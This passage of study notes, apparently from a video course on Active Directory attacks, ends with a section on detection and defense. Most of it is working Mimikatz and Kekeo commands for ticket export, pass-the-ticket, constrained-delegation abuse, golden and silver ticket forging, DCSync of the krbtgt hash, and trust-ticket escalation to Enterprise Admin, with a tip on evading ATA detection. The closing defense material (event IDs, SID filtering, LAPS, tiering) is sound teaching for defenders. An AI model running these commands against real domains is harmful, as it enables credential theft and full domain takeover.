- We need to compromise the server where Unconstrained Delegation is enabled and wait for or trick a high privilege user to connect to the box. Once such a user is connected, we can export all the tickets, including the TGT of that user using the following command:<br/>
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'<br/>
<br/>
Note: we need administrator rights on the server, where Unconstrained Delegation is enabled!<br/>
<br/>
- the ticket can be reused:<br/>
Invoke-Mimikatz -Command '"kerberos::ptt c:\tickets\admin.kirbi"'<br/>
<br/>
<br/>
Constrained Delegation:<br/>
- Introduced in Server 2008<br/>
- as the name suggests, constrained delegation allows access only to specified services on specific computers!<br/>
- a typical abusable scenario is when a student authenticates using a non-kerberos authentication and Protocol Transition is used by Kerberos to support a single sign on.<br/>
- Couple of Kerberos extensions come into play for Protocol Transition but we are not going to discuss them.<br/>
- The service account must have TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION-T2A4D &nbsp;UserAccountControl attribute.<br/>
- the service account can access all the services specified in its msDS-AllowedToDelegateTo attribute.<br/>
- another interesting issue is that the delegation occurs not only for the specified service but for any service running under the same account. There is no validation for the SPN specified.<br/>
<br/>
- Enumerate users and computers with constrained delegation enabled.<br/>
<br/>
- Using PowerView (dev):<br/>
.\PowerView-Dev.ps1<br/>
Get-DomainUser -TrustedToAuth<br/>
Get-DomainComputer -TrustedToAuth<br/>
<br/>
- Using Active Directory Module:<br/>
Get-AdObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo<br/>
<br/>
- we need to get clear text password or the NTLM hash of the service account. It can then be used with Kekeo:<br/>
https://github.com/gentilkiwi/kekeo/<br/>
<br/>
.\asktgt.exe /user:termadmin /domain:lethallab.local /key:abf05c4e729e45781acd30ed80674b1c /ticket:termadmin.kirbi<br/>
<br/>
- Now, using s4u from Kekeo, request a TGS:<br/>
\s4u.exe /tgt:termadmin.kirbi /user:administrator@lethallab.local /service:cifs/ops-sqlsrvone.lethallab.local<br/>
<br/>
<br/>
- Use the TGS:<br/>
Invoke-Mimikatz -command '"kerberos:Ptt cifs.ops-sqlsrvone.lethallab.local.kirbi"'<br/>
<br/>
ls \\ops-sqlsrvone.lethallab.local\C$<br/>
<br/>
- recall that the delegation is not restricted by SPN, it is possible to create alternate tickets. Exploit it :)<br/>
<br/>
############################<br/>
Video 6 Persistence Techniques:<br/>
<br/>
- there are many, but we will only mention 2 of them and these 2 are really useful<br/>
- A golden ticket is signed and encrypted by the hash of krbtgt account which makes it a valid TGT ticket.<br/>
- since user account validation is not done by the Domain Controller (KDC service) until TGT is older than 20 minutes, we can use even deleted/revoked accounts.<br/>
- the krbtgt user hash could be used to impersonate any user with any privileges from even a non-domain machine.<br/>
- single password change has no effect on this ticket.<br/>
<br/>
- Execute mimikatz on DC:<br/>
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName win2016srv<br/>
<br/>
- On Any Machine:<br/>
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:lethallab.local /sid:s-1-5-21-32-70384115-3177237293-604223749 /krbtgt:5c1a7d30a872cac2b732e7857589d97 /id:500 /groups:513 /ptt"'<br/>
<br/>
- To use the DCSync feature for getting krbtgt hash execute the following command with DA privileges for ops domain:<br/>
Invoke-Mimikatz -Command '"lsadump:dcsync /user:ops\krbtgt'"<br/>
<br/>
- A valid TGS (Golden ticket is TGT).<br/>
- Encrypted and Signed by the NTLM hash of the service account (Golden ticket is signed by hash of krbtgt) of the service running with that account.<br/>
- Services rarely check PAC (Privileged Attribute Certificate).<br/>
- Services will allow access only to the services themselves.<br/>
<br/>
- For example, using hash of the Domain Controller computer account, the below command provides access to shares on the DC:<br/>
Invoke-Mimikatz -Command '"kerberos::golden /domain:lethallab.local /sid:s-1-5-21-3270384115-3177237293-604223748 /target:win2008srv.lethallab.local /service:cifs /rc4:536752aef9acef8ad3b089a281830b1 /id:500 /user:Administrator /ptt"'<br/>
<br/>
#######################<br/>
Video 7 Privilege Escalation Across Trusts and Domains:<br/>
<br/>
Child to Forest Root:<br/>
- Domains in the same forest have an implicit two-way trust with the forest root<br/>
- There is a trust key between the parent and child domains.<br/>
- There are two ways of escalating privileges between two domains of the same forest:<br/>
&nbsp; &nbsp; - krbtgt hash<br/>
&nbsp; &nbsp; - Tryst tickets<br/>
<br/>
Look up Child to Parent Trust Flow and read up on it!<br/>
<br/>
Child to Forest Root using Trust Tickets:<br/>
- So what is required to forge trust tickets is, obviously, the trust key:<br/>
Invoke-Mimikatz -Command '"lsadump::trust /patch"'<br/>
<br/>
- An inter-realm TGT can be forged:<br/>
Invoke-Mimikatz -Command '"Kerberos::golden /domain:win2008srv.lethallab.local /sid:s-1-5-21-133038098-372414864-1077246548 /sids:s-1-5-21-3270384115-3177237393-604224748-519 /rc4:f43d2a6daf7641d745fb225be755d8110 /user:Administrator /service:krbtgt /target:powershell.local /ticket:c:\users\Administrator\Desktop\trust_tkt.kirbi"'<br/>
<br/>
- Use the TGS to access the targeted service:<br/>
.\kirbikator.exe lsa .\CIFS.ps-dc.powershell.local.kirbi ls \\ps-dc.powershell.local\C$<br/>
<br/>
- Get a TGS for a service (CIFS below) in the target domain by using the forged trust ticket:<br/>
.\asktgs.exe c:\users\administrator\Desktop\trust_tkt.kirbi CIFS/ps-dc.powershell.local<br/>
<br/>
- Tickets for other services (like HOST and RPCSS for WMI, HOST and HTTP for PowerShell Remoting and WinRM) can be created as well.<br/>
<br/>
Child to Forest Root using krbtgt hash:<br/>
- SID history once again:<br/>
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'<br/>
<br/>
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:offensiveps.powershell.local /sid:s-1-5-21-2969453985-3470385542-739374646 /krbtgt:a9d1cf9d08b6701bca220079b1557506 /sids:s-1-5-21-257853-8781-2508153159-3419410681-519 /ticket:krb_tkt.kirbi"'<br/>
<br/>
- On a machine of offensivepc domain:<br/>
Invoke-Mimikatz -Command '"kerberos::pt c:\test\krb_tkt.kirbi"'<br/>
<br/>
- We now have Enterprise Admin Privileges:<br/>
ls //ps-dc.powershell.local/C$<br/>
<br/>
#######################<br/>
Video 8 Detection and Defense:<br/>
<br/>
- Do not allow or limit login of DAs to any other machine other than the Domain Controller. If logins to some server is necessary, do not allow other administrators to login to that machine!<br/>
- Do NOT run services with DA account. Many good credential reuse defenses are rendered useless because of it.<br/>
<br/>
Some Important Event ID:<br/>
-Event ID:<br/>
&nbsp; &nbsp; - 4624: Account Logon<br/>
&nbsp; &nbsp; - 4634: Admin Logoff<br/>
&nbsp; &nbsp; - 4672: Admin Logon<br/>
<br/>
Detection and Defense against Kerberoast:<br/>
Events:<br/>
- Security Event ID 4769 - A Kerberos ticket was requested<br/>
<br/>
Migitation:<br/>
- Service Account Passwords should be hard to guess (greater than 25 characters)<br/>
- Use Managed Service Accounts (Automatic change of password periodically and delegated SPN Management)<br/>
https://technet.microsoft.com/en-us/library/jj128431(v=ws.11).aspx<br/>
<br/>
SID filtering:<br/>
- avoid attacks which abuse SID history attribute (child to root domain privilege escalation, that is, DA from a Child to EA on forest root).<br/>
- enabled by default on all inter-forest trusts. Intra-Forest trusts are assumed secured by default (Microsoft considers forest and not the domain to be a security boundary).<br/>
- But, since SID filtering has potential to break applications and user access, it is often disabled.<br/>
<br/>
Selective Authentication:<br/>
- in an inter-forest trust, if Selective Authentication is configured, users between the trusts will not be automatically authenticated. Individual access to domains and servers in the trusting domain/forest should be given.<br/>
<br/>
Microsoft ATA (Advanced Threat Analytics):<br/>
- traffic destined for Domain Controller(s) is mirrored to ATA sensors and a user activity profile is build over time - use of computers, credentials, log on machines, etc.<br/>
- Collect Event 4776 (The DC attempted to validate the credentials for an account) to detect credential replay attacks.<br/>
- Can DETECT behavior anomalies! &nbsp; <br/>
- Useful for detecting:<br/>
&nbsp; &nbsp; - Recon: account enumeration, Netsession enumeration<br/>
&nbsp; &nbsp; - Compromised Credentials Attacks: Brute force, high privilege account/service account exposed in clear text, Honey token, &nbsp; &nbsp; &nbsp; unusual protocol (NTLM and Kerberos)<br/>
&nbsp; &nbsp; - Credential/Hash/Ticket Replay attacks.<br/>
<br/>
Bypassing ATA:<br/>
- ATA, for all its goodness, can be bypassed and avoided<br/>
- The key is avoid talking to the DC as long as possible and make appear the traffic we generate as attacker normal!<br/>
<br/>
Architectural Changes:<br/>
LAPS(Local Administrator Password Solution):<br/>
- Centralized storage of passwords in AD with periodic randomizing where read permissions can be access controlled<br/>
- Storage in clear text, transmission is encrypted<br/>
- LAPS into: https://technet.microsoft.com/en-us/mt227395.aspx<br/>
- Abusing LAPS feature:<br/>
https://blog.netspi.com/running-laps-around-cleartext-passwords/<br/>
<br/>
Privileged Administrative Workstations (PAWs):<br/>
- a hardened workstation for performing sensitive tasks like administration of domain controllers, cloud infrastructure, sensitive business functions, etc.<br/>
- can provide protection from phishing attacks, OS vulnerabilities, credential replay attacks.<br/>
<br/>
Privileged Administrative Workstations (PAWs):<br/>
Multiple strategies:<br/>
- Separate privilege and hardware for administrative and normal tasks<br/>
- Admin Jump servers to be accessed only from a PAW<br/>
- Having a VM on a PAW for user tasks<br/>
<br/>
Active Directory Administrative Tier Model<br/>
Composed of three levels only for administrative accounts:<br/>
- Tier 0 - Accounts, Groups, and computers which have privileges across the enterprise like domain controllers, domain admins, enterprise admins.<br/>
- Tier 1 - Accounts, Groups and Computers which have access to resources having significant amount of business value. A common example role is server administrators who maintain these operating systems with the ability to impact all enterprise services.<br/>
- Tier 2 - Administrator accounts which have administrative control of significant amount of business value that is hosted on user workstations and devices. Examples, include Help Desk and computer support administrators because they can impact the integrity of almost any user data.<br/>
<br/>
So we are implementing: Control Restrictions, Logon Restrictions (and Directional from Tier 2, to Tier 1, to Tier 0).<br/>
<br/>
ESAE (Enhanced Security Admin Environment):<br/>
Dedicated administrative forest for managing critical assets like administrative users, groups and computers.<br/>
Since a forest is considered a security boundary rather than a domain, this model provides enhanced security controls.<br/>
The Administrative forest is also called the Red Forest!<br/>
Administrative users in a production forest are used as standard non-privileged users in the administrative forest.<br/>
Selective Authentication to the Red Forest enables stricter security controls on logon of users from non-administrative forests.<br/>
<br/>
Securing Prileged Access:<br/>
https://technet.microsoft.com/en-us/windows-server-docs/security/securing-privileged-access/securing-privileged-access<br/>
<br/>
Microsoft Paper - Best Practices for Security Active Directory:<br/>
http://aka.ms/bpsadtrd</body></html>